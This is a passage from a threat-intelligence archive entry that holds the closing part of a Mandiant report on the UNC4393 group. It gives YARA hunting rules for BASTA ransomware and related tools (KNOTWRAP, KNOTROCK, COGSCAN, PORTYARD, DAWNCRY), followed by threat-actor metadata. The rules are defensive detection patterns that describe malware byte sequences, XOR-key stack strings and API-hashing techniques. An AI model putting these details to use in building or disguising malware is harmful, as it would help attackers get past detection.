M_Ransomware_BASTA_3\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n platforms = \"Windows\"\r\n malware_family = \"BASTA\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 12 of 17\n\nstrings:\r\n $code1 = {8B 86 [4]2B 46 ?? 40 0F AF 86 [4]89 86 [4]8B\r\n46 ?? 31 04 0F}\r\n $code2 = {8B 0? 0? A1 [4]33 88 [4]8B 80 [4]89 0? 0? }\r\n $code3 = {C1 E? 10 [0-6] 88 ?? 0? 8B ?? FF 4? ?? [5-9] C1\r\nE? 08 [0-9]88 ?? 0? [0-5] FF 4? ?? 8B 4? ?? 8B 8? [4] 88 1C 01}\r\n $decr1 = {F7 74 8E ?? 0F B6 15 [4] 33 C2 A2}\r\n $decr2 = {33 44 0A ?? B9 [4]D1 E1 8B 55 ?? 89 44 0A}\r\n $decr3 = {2B 0D [4]81 F1 [4]33 88 [4]BA [4]6B C2 00 89 88}\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) ==\r\n0x00004550 and (2 of ($code*) or all of ($decr*))\r\n \r\n}\r\nKNOTWRAP\r\nrule M_Dropper_KNOTWRAP_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n md5 = \"56c1a45c762a29fe6080788f85e6cfc3\"\r\n platforms = \"Windows\"\r\n malware_family = \"KNOTWRAP\"\r\n strings:\r\n $hex_asm_snippet_a = { B9 18 01 00 00 2? F8 }\r\n $hex_asm_snippet_b = { 84 C? (7?|E?) [0-4] 32 D? C1 C2 08 }\r\n $hex_asm_snippet_c = { 25 FF 0F 00 00 03 4? 08 03 C? 29 1? }\r\n $hex_asm_snippet_d = { 0F BA F0 1F (7?|E?) [0-4] 03 4? 08 8D\r\n4? 02 5? 5? 
FF 55 }\r\n condition:\r\n all of them\r\n}\r\nrule M_Dropper_KNOTWRAP_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 13 of 17\n\ndescription = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n platforms = \"Windows\"\r\n malware_family = \"KNOTWRAP\"\r\n \r\n strings:\r\n $str1 = \"Executable (*.exe)|*.exe|Command (*.com)|*.com|Information\r\n(*.pdf)|*.pdf|Batch (*.bat)|*.bat|All Files (*.*)|*.*||\" wide\r\n $str2 = \"Default Menu=Default application menu. Appears when\r\nno documents are open.\" wide\r\n $str3 = \"All CommandsMAll your changes will be lost!\" wide\r\n $str4 = \"Windows sockets initialization failed.\" wide\r\n $str5 = \"TextMining\" wide\r\n $str6 = \"mailto:stefan-mihai@moga.doctor\" wide\r\n $api1 = \"[CryptoAPI]\" wide\r\n $api2 = \"CryptDecrypt:\" wide\r\n $api3 = \"CryptDeriveKey:\" wide\r\n $api4 = \"CryptHashData:\" wide\r\n $api5 = \"CryptCreateHash:\" wide\r\n $api6 = \"CryptAcquireContext:\" wide\r\n $api7 = \"CryptEncrypt:\"wide\r\n \r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550\r\nand all of them\r\n \r\n}\r\nKNOTROCK\r\nrule M_Utility_KNOTROCK_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n md5 = \"b2af1cd157221f240ce8f8fa88bf6d44\"\r\n platforms = \"Windows\"\r\n malware_family = \"KNOTROCK\"\r\n strings:\r\n $s1 = \"Specify path to shares list in 1st argument.\r\nSpecify locker path in 2nd argument\" wide fullword\r\n $s2 = \"(like C:\\\\Windows\\\\locker.exe)\" wide fullword\r\n $s3 = \"-forcepath\" wide fullword\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 14 of 17\n\n$s4 = \"-nomutex\" wide fullword\r\n $c1 = \"lpSymlinkFileName\" fullword\r\n $c2 = 
\"lpTargetFileName\" fullword\r\n $c3 = \"CreateSymbolicLink\" fullword\r\n $marker1 = \"$7d7b40c2-b763-4388-ac13-79711209439b\"\r\nfullword\r\n $marker2 = \"C:\\\\Users\\\\cdsf\\\\source\\\\repos\\\\LinkShares\\\\\r\nLinkShares\\\\obj\\\\Release\\\\LinkShares.pdb\" fullword\r\n condition:\r\n (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550)\r\nand ((3 of ($s*) and all of ($c*) ) or any of ($marker*))\r\n \r\n}\r\nCOGSCAN\r\nrule M_Recon_COGSCAN_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n family = \"COGSCAN\"\r\n md5 = \"d4fd61c1bb582b77a87259bcd44178d4\"\r\n platform = \"Windows\"\r\n \r\n strings:\r\n $str_format = \"{0,-20}|{1,-10}|{2,-10}|{3,-20}|{4, -50}|{5, -15}|\r\n{6, -7}|{7, -10}|{8, -10}\" wide fullword\r\n $str_param1 = \"PcName\" wide fullword\r\n $str_param2 = \"Ping?\" wide fullword\r\n $str_param3 = \"135(rpc)\" wide fullword\r\n $str_param4 = \"OsName\" wide fullword\r\n $str_param5 = \"LastKb\" wide fullword\r\n $str_param6 =\"Site\" wide fullword\r\n $str_func1 = \"CheckForZLAndWC\" fullword\r\n $str_func2 = \"GetTypeFromProgID\" fullword\r\n $str_func3 = \"CheckForPN\" fullword\r\n $str_func4 = \"TryGetOsName\" fullword\r\n $str_func5 = \"TryPrepare\" fullword\r\n $str_func6 = \"CustomLDAP\" fullword\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 15 of 17\n\n$file1 = \"ldap.txt\" wide fullword\r\n $file2 = \"c:\\\\users\\\\public\\\\pc.txt\" wide fullword nocase\r\n $file3 = \"c:\\\\users\\\\public\\\\online.txt\" wide fullword nocase\r\n $file4 = \"_sorted.txt\" wide fullword\r\n $file5 = \"Take your file: online.txt\" wide fullword\r\n $file6 = \"Take sorted file: sorted.txt\" wide fullword\r\n $arg1 = \"-customldap\" wide fullword\r\n $arg2 = \"-pingtimeout\" wide fullword\r\n $arg3 = \"-offlineresolve\" wide fullword\r\n $arg4 = \"-autoruninfo\" wide 
fullword\r\n $arg5 = \"-detectsites\" wide fullword\r\n $arg6 = \"-bypassping\" wide fullword\r\n $arg7 = \"-fromfile\" wide fullword\r\n $arg8 = \"-printcountonly\" wide fullword\r\n $marker1 = \"---UNKNOWN---\" wide fullword\r\n $marker2 = \"---DC---\" wide fullword\r\n $marker3 = \"---SERVERS---\" wide fullword\r\n $marker4 = \"---USER PC---\" wide fullword\r\n condition:\r\n (uint16(0)==0x5A4D and uint32(uint32(0x3C))==0x00004550)\r\nand (4 of ($str*) and 2 of ($file*) and 3 of ($arg*) and 1 of ($marker*))\r\n}\r\nPORTYARD\r\nrule M_Tunneler_PORTYARD_1 {\r\n meta:\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n family = \"portyard\"\r\n md5 = \"25dd591a343e351fd72b6278ebf8197e\"\r\n platform = \"Windows\"\r\n \r\n strings:\r\n $tunnel_commands_validate = {41 B? 04 00 00 00 [0-16]\r\n41 B9 08 00 00 00 [0-24] FF 15 [4-64] 0F B6 45 ?? 3C 01}\r\n $intial_connection_validate = {41 B? A0 1F 00 00 [0-32] ff\r\n15 [4-64] 48 0F ?? ?? 01 [0-32] 48 85 C? [0-64] 40 38 ?? ?? 02 [0-8]\r\n48 FF C? 48 3B C? [2-64] C7 45 ?? 
05 00 [1-16] FF 15}\r\n condition:\r\n all of them\r\n \r\n}\r\nDAWNCRY\r\nrule M_Dropper_DAWNCRY_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n family = \"DAWNCRY\"\r\n md5 = \"a9447a25ab79eed2942997daced4eb3e\"\r\n platform = \"Windows\"\r\n \r\n strings:\r\n $stackstring_xor_key = {C6 85 [4] 65 C6 85 [4] 69 C6 85\r\n[4] 55 C6 85 [4] 56 C6 85 [4] 79 C6 85 [4] 72 C6 85 [4] 79 C6 85\r\n[4] 67 C6 85 [4] 6C C6 85 [4] 3E C6 85 [4] 58 C6 85 [4] 45 C6 85\r\n[4] 2A C6 85 [4] 5E C6 85 [4] 71 C6 85 [4] 78 C6 85 [4] 45 C6 85\r\n[4] 59 C6 85 [4] 69 C6 85 [4] 49 C6 85 [4] 56 C6 85 [4] 56 C6 85\r\n[4] 61 C6 85 [4] 38 C6 85 [4] 34 C6 85 [4] 4C C6 85 [4] 00}\r\n $part_of_xor_decrypt = {48 01 ?? 0F B6 84 [5] 44 31 C8 41\r\n88 ?? 48 83 85 [4] 01 48 8B [5] 48 39 [5] 0F 82 }\r\n $peb_ldr_data = {48 31 C0 65 48 8B 04 25 60 00 00 00 48\r\n8B 40 18 48 8B 40 20 48 8B 00 48 8B 40 20 C3}\r\n $hardcoded_ntAllocateVirtualMemory_hash = {BA E2 A5\r\n92 6D 48 89 C1 E8}\r\n condition:\r\n (uint16(0)==0x5A4D and uint32(uint32(0x3C))==0x00004550)\r\nand 3 of them\r\n \r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight"
	],
	"report_names": [
		"unc4393-goes-gently-into-silentnight"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "908cf62e-45cd-492b-bf12-d0902e12fece",
			"created_at": "2024-08-20T02:00:04.543947Z",
			"updated_at": "2026-04-10T02:00:03.68848Z",
			"deleted_at": null,
			"main_name": "UNC4393",
			"aliases": [
				"Storm-1811",
				"CURLY SPIDER",
				"STAC5777"
			],
			"source_name": "MISPGALAXY:UNC4393",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "50fd5da4-c2f3-4a35-aebe-14f86fd567cb",
			"created_at": "2025-03-04T02:00:02.997969Z",
			"updated_at": "2026-04-10T02:00:03.813132Z",
			"deleted_at": null,
			"main_name": "UNC3973",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC3973",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434486,
	"ts_updated_at": 1775791896,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/11aff090bd59803ed7a2e8cf4eab0a9233176e67.pdf",
		"text": "https://archive.orkl.eu/11aff090bd59803ed7a2e8cf4eab0a9233176e67.txt",
		"img": "https://archive.orkl.eu/11aff090bd59803ed7a2e8cf4eab0a9233176e67.jpg"
	}
}